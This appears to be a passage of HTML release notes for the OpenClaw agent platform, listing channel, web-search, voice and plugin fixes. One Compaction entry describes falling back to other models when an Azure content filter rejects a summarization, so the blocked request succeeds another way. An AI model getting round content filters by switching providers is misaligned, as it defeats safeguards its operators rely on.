<p>Slack/message actions: prefer the account bound to the outbound target peer before falling back to the agent's first channel account, so multi-workspace sends use the intended Slack account. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264751663" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66807/hovercard" href="https://github.com/openclaw/openclaw/pull/66807">#66807</a>. Thanks @rijhsinghani.</p>
</li>
<li>
<p>Slack/delivery: retry Slack Web API writes only when the SDK wraps a DNS request failure such as <code>EAI_AGAIN</code>, so transient resolver hiccups can recover without retrying platform errors that may duplicate messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289779783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68789" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68789/hovercard" href="https://github.com/openclaw/openclaw/issues/68789">#68789</a>. Thanks @sonnyb9.</p>
</li>
<li>
<p>Slack/message actions: forward agent-scoped media roots through the bundled upload-file action path, so workspace files can be attached without failing the local-media guard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242973170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64625/hovercard" href="https://github.com/openclaw/openclaw/issues/64625">#64625</a>. Thanks @benpchandler.</p>
</li>
<li>
<p>Slack/mentions: resolve <code>&lt;!subteam^...&gt;</code> user-group mentions through Slack <code>usergroups.users.list</code> and treat them as explicit mentions only when the bot user is a member, so mention-gated agent channels wake for real user-group mentions without config-only allowlists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346503795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73827/hovercard" href="https://github.com/openclaw/openclaw/issues/73827">#73827</a>. Thanks @CG-Intelligence-Agent-Jack.</p>
</li>
<li>
<p>Slack/message tool: let <code>read</code> fetch an exact Slack message timestamp, including a specific thread reply when paired with <code>threadId</code>, instead of returning only the parent thread or recent channel history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4130437054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53943" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53943/hovercard" href="https://github.com/openclaw/openclaw/issues/53943">#53943</a>. Thanks @zomars.</p>
</li>
<li>
<p>PDF/Gemini: send native PDF analysis API keys in the <code>x-goog-api-key</code> header instead of the request URL, keeping secrets out of proxy and access logs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4202693803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60600" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60600/hovercard" href="https://github.com/openclaw/openclaw/pull/60600">#60600</a>. Thanks @garagon.</p>
</li>
<li>
<p>Web search/Gemini: route agent abort signals into provider fetches and log provider-side abort failures as normal tool errors instead of silently aborting the run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338236726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72995" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72995/hovercard" href="https://github.com/openclaw/openclaw/issues/72995">#72995</a>. Thanks @RoseKongPS.</p>
</li>
<li>
<p>Web search: point missing-key errors to <code>web_fetch</code> for known URLs and the browser tool for interactive pages. Thanks @zhaoyang97.</p>
</li>
<li>
<p>Web search: late-bind managed agent <code>web_search</code> calls to the current runtime config snapshot, so existing sessions do not keep stale unresolved SecretRefs after secrets reload. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362762607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75420/hovercard" href="https://github.com/openclaw/openclaw/issues/75420">#75420</a>. Thanks @richardmqq.</p>
</li>
<li>
<p>Web search/Gemini: reuse <code>models.providers.google.apiKey</code> and <code>models.providers.google.baseUrl</code> as lower-priority fallbacks for Gemini web search after dedicated search config and <code>GEMINI_API_KEY</code>. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4167524438" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57496" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57496/hovercard" href="https://github.com/openclaw/openclaw/pull/57496">#57496</a>. Thanks @Aoiujz.</p>
</li>
<li>
<p>Web search/Gemini: pass <code>freshness</code> and <code>date_after</code>/<code>date_before</code> filters through Google Search grounding time ranges. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261488656" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66498" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66498/hovercard" href="https://github.com/openclaw/openclaw/issues/66498">#66498</a>. Thanks @ismael-81.</p>
</li>
<li>
<p>Web search/DuckDuckGo: include the keyless DuckDuckGo provider in the web search setup wizard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253504720" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65862" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65862/hovercard" href="https://github.com/openclaw/openclaw/issues/65862">#65862</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254540581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65940/hovercard" href="https://github.com/openclaw/openclaw/pull/65940">#65940</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Web search: honor <code>baseUrl</code> overrides for Gemini, Grok, and x_search provider-owned config, so proxy-backed search tools no longer dial hardcoded public endpoints. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212565688" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61972/hovercard" href="https://github.com/openclaw/openclaw/pull/61972">#61972</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>.</p>
</li>
<li>
<p>Web search/Brave: point Brave provider metadata at the canonical <code>/tools/brave-search</code> docs page and make the legacy <code>/brave-search</code> docs page a redirect stub. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253527816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65870/hovercard" href="https://github.com/openclaw/openclaw/issues/65870">#65870</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253794124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65892" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65892/hovercard" href="https://github.com/openclaw/openclaw/pull/65892">#65892</a>. Thanks @Magicray1217 and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Web search/Brave: allow <code>freshness</code> and bounded date ranges in <code>llm-context</code> mode, matching Brave's documented LLM Context API support. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107380876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51005" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51005/hovercard" href="https://github.com/openclaw/openclaw/pull/51005">#51005</a>. Thanks @remusao.</p>
</li>
<li>
<p>Web fetch: resolve external plugin <code>webFetchProviders</code> for non-sandboxed <code>web_fetch</code>, while keeping sandboxed fetches limited to bundled providers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355873723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74915" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74915/hovercard" href="https://github.com/openclaw/openclaw/issues/74915">#74915</a>. Thanks @ultrahighsuper and @mingmingtsao.</p>
</li>
<li>
<p>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</p>
</li>
<li>
<p>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</p>
</li>
<li>
<p>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</p>
</li>
<li>
<p>Slack/directory: make <code>openclaw directory peers/groups list --channel slack</code> prefer token-backed live readers and return the connected Slack account from <code>directory self</code>, so valid Slack tokens no longer produce empty directory CLI results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105363396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50776/hovercard" href="https://github.com/openclaw/openclaw/issues/50776">#50776</a>. Thanks @pjaillon.</p>
</li>
<li>
<p>Slack: keep assistant typing status, temporary typing reactions, and status reactions active for group/channel turns that use message-tool-only visible replies, while still suppressing automatic source replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367334076" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75877/hovercard" href="https://github.com/openclaw/openclaw/issues/75877">#75877</a>. Thanks @teosborne.</p>
</li>
<li>
<p>Slack: recover full inbound DM text from top-level rich-text blocks when Slack sends a shortened message preview, so long direct messages still reach the agent intact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4147105482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55358" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55358/hovercard" href="https://github.com/openclaw/openclaw/issues/55358">#55358</a>. Thanks @tonyjwinter.</p>
</li>
<li>
<p>Replies: strip legacy <code>[TOOL_CALL]{tool =&gt; ..., args =&gt; ...}[/TOOL_CALL]</code> pseudo-call text from user-facing replies and flag it in tool-call diagnostics instead of showing raw tool syntax in channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230337239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63610" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63610/hovercard" href="https://github.com/openclaw/openclaw/issues/63610">#63610</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</p>
</li>
<li>
<p>WhatsApp: close long-lived web sockets through Baileys <code>end(error)</code> before falling back to raw websocket close, so listener teardown runs Baileys cleanup instead of leaving zombie sockets. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116852446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52442" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52442/hovercard" href="https://github.com/openclaw/openclaw/issues/52442">#52442</a>. Thanks @essendigitalgroup-cyber.</p>
</li>
<li>
<p>Twitch/plugins: emit a flat JSON Schema for Twitch channel config so single-account and multi-account configs validate before runtime load, and add source-checkout diagnostics for missing pnpm workspace dependencies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/sessions: move hot transcript reads and mirror appends onto async bounded IO with serialized parent-linked writes, keeping large session histories from stalling Gateway requests and channel replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364571913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75656/hovercard" href="https://github.com/openclaw/openclaw/issues/75656">#75656</a>. Thanks @DerFlash.</p>
</li>
<li>
<p>macOS/Talk Mode: downmix multi-channel microphone buffers before handing them to Apple Speech across Push-to-Talk, Talk Mode, Voice Wake, and the wake-word tester, so pro audio interfaces no longer produce empty transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054504623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42533" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42533/hovercard" href="https://github.com/openclaw/openclaw/issues/42533">#42533</a>. Thanks @jbuecker.</p>
</li>
<li>
<p>macOS/Talk Mode: subscribe native WebChat to active-session transcript updates and render external spoken user turns in the chat thread instead of only showing assistant replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359538657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75155" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75155/hovercard" href="https://github.com/openclaw/openclaw/issues/75155">#75155</a>. Thanks @SledderBling.</p>
</li>
<li>
<p>macOS/Voice Wake: accept trigger-only phrases in the built-in Voice Wake test, matching the settings UI and runtime trigger-only path instead of requiring extra command text after the wake word. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245638367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64986/hovercard" href="https://github.com/openclaw/openclaw/issues/64986">#64986</a>. Thanks @zoiks65.</p>
</li>
<li>
<p>Cron/TTS: run cron announce payloads through the normal TTS directive transform before outbound delivery, so scheduled <code>[[tts]]</code> replies generate voice payloads instead of leaking raw tags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115170457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52125" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52125/hovercard" href="https://github.com/openclaw/openclaw/issues/52125">#52125</a>. Thanks @kenchen3000.</p>
</li>
<li>
<p>WhatsApp: save downloadable quoted image media from reply context as inbound media, so agents can inspect an image that a user replied to instead of only seeing <code>&lt;media:image&gt;</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4188698212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59174" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59174/hovercard" href="https://github.com/openclaw/openclaw/issues/59174">#59174</a>. Thanks @gaffner.</p>
</li>
<li>
<p>Sessions/store: stop persisting the runtime-only <code>skillsSnapshot.resolvedSkills</code> array inside each session entry, so <code>sessions.json</code> no longer carries a copy of every parsed <code>SKILL.md</code> body for every active session; <code>ensureSkillSnapshot</code> rehydrates the array from disk on cold resume so the embedded runner, the Claude CLI skills plugin, and the Claude live-session fingerprint all see populated skills, and legacy stores self-heal on the next save. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3913009724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11950/hovercard" href="https://github.com/openclaw/openclaw/issues/11950">#11950</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3883150285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6650" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6650/hovercard" href="https://github.com/openclaw/openclaw/issues/6650">#6650</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3934112753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/15000" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/15000/hovercard" href="https://github.com/openclaw/openclaw/issues/15000">#15000</a>. Thanks @amoghasgekar.</p>
</li>
<li>
<p>Doctor/WhatsApp: warn when Linux crontabs still run the legacy <code>ensure-whatsapp.sh</code> health check, which can misreport <code>Gateway inactive</code> when cron lacks the systemd user-bus environment. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4199567980" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60204" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60204/hovercard" href="https://github.com/openclaw/openclaw/issues/60204">#60204</a>. Thanks @mySebbe.</p>
</li>
<li>
<p>Slack/setup: print the generated app manifest as plain JSON instead of embedding it inside the framed setup note, so it can be copied into Slack without deleting border characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251790246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65751" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65751/hovercard" href="https://github.com/openclaw/openclaw/issues/65751">#65751</a>. Thanks @theDanielJLewis.</p>
</li>
<li>
<p>Channels/WhatsApp: route CLI logout through the live Gateway and stop runtime-backed listeners before channel removal, so removing a WhatsApp account does not leave the old socket replying until restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277177561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67746" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67746/hovercard" href="https://github.com/openclaw/openclaw/issues/67746">#67746</a>. Thanks @123Mismail.</p>
</li>
<li>
<p>Voice Call/Twilio: honor TTS directive text and provider voice/model overrides during telephony synthesis, so <code>[[tts:...]]</code> tags are not spoken literally and voiceId overrides reach OpenAI/ElevenLabs calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175530255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58114/hovercard" href="https://github.com/openclaw/openclaw/issues/58114">#58114</a>. Thanks @legonhilltech-jpg.</p>
</li>
<li>
<p>Agents/session-locks: reclaim untracked current-process session locks with matching starttime during acquisition and startup cleanup, so Gateway restarts recover from self-owned orphan <code>.jsonl.lock</code> files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366526190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75805" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75805/hovercard" href="https://github.com/openclaw/openclaw/issues/75805">#75805</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093489842" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49603" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49603/hovercard" href="https://github.com/openclaw/openclaw/issues/49603">#49603</a>. Thanks @cdznho.</p>
</li>
<li>
<p>Agents/subagents: initialize built-in context engines before native <code>sessions_spawn</code> resolves spawn preparation, so cliBackend-only cold starts no longer fail with an unregistered <code>legacy</code> context engine. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339592375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73095/hovercard" href="https://github.com/openclaw/openclaw/issues/73095">#73095</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347197163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73904/hovercard" href="https://github.com/openclaw/openclaw/pull/73904">#73904</a>) Thanks @brokemac79.</p>
</li>
<li>
<p>Plugins/Bonjour: ship the ciao runtime dependency with packaged OpenClaw so fresh OCM envs can start default mDNS discovery without a missing-module failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: scope reply plugin-tool discovery to manifest-declared tool owners and already-active matching tool entries, avoiding broad plugin runtime loading for narrow or core-only tool allowlists. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/replies: defer implicit image model discovery and keep OAuth auth-store adoption on persisted profiles during reply startup, cutting OCM MarCodex warm prep to sub-second in live checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/tools: enforce <code>contracts.tools</code> as the manifest ownership contract for plugin tool registration, rejecting undeclared runtime tool names and adding bundled plugin drift coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/Codex: stop prompting message-tool-only source turns to finish with <code>NO_REPLY</code>, so quiet turns are represented by not calling the visible message tool instead of conflicting final-text instructions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Gateway/config: report failed backup restores as failed in logs and config observe audit records instead of marking them valid. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314005687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70515" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70515/hovercard" href="https://github.com/openclaw/openclaw/pull/70515">#70515</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</p>
</li>
<li>
<p>Compaction: use the active session model fallback chain for implicit summarization failures without persisting fallback model selection, so Azure content-filter 400s can recover. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245460651" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64960" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64960/hovercard" href="https://github.com/openclaw/openclaw/issues/64960">#64960</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352068136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74470/hovercard" href="https://github.com/openclaw/openclaw/pull/74470">#74470</a>) Thanks @jalehman and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</p>
</li>
<li>
<p>Gateway/config: allow <code>gateway config.patch</code> to update documented subagent thinking defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365780380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75764" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75764/hovercard" href="https://github.com/openclaw/openclaw/issues/75764">#75764</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366498289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75802" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75802/hovercard" href="https://github.com/openclaw/openclaw/pull/75802">#75802</a>) Thanks @kAIborg24.</p>
</li>
<li>
<p>Plugins/CLI: keep git plugin install paths credential-free, preserve existing git checkouts until replacement succeeds, honor duplicate npm install mode, and remove managed git repos on uninstall. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/CLI: redact authenticated git URLs from git install command failure details, so failed clone or checkout output cannot leak credentials during plugin installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/status reactions: remove stale non-terminal lifecycle reactions when a run reaches done or error, so Discord does not leave a permanent thinking emoji after completion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363092374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75458/hovercard" href="https://github.com/openclaw/openclaw/issues/75458">#75458</a>. Thanks @davelutztx.</p>
</li>
<li>
<p>Discord/doctor: migrate unsupported per-channel <code>agentId</code> entries under guild channel config into top-level <code>bindings[]</code> routes, so <code>openclaw doctor --fix</code> preserves the intended agent route instead of stripping it as an unknown key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217423565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62455/hovercard" href="https://github.com/openclaw/openclaw/issues/62455">#62455</a>. Thanks @lobster-biscuit.</p>
</li>
<li>
<p>Discord/DMs: set inbound direct-message <code>ctx.To</code> to the semantic <code>user:&lt;id&gt;</code> target while keeping delivery routed through the DM channel, so mirror and recovery paths do not treat DMs as channel conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4282995155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68126" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68126/hovercard" href="https://github.com/openclaw/openclaw/issues/68126">#68126</a>. Thanks @illuminate0623.</p>
</li>
<li>
<p>Discord/DMs: keep no-guild inbound messages on direct-message routing when Discord channel lookup is temporarily unavailable, preventing degraded DMs from forking into channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195831671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59817" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59817/hovercard" href="https://github.com/openclaw/openclaw/issues/59817">#59817</a>. Thanks @DooPeePey.</p>
</li>
<li>
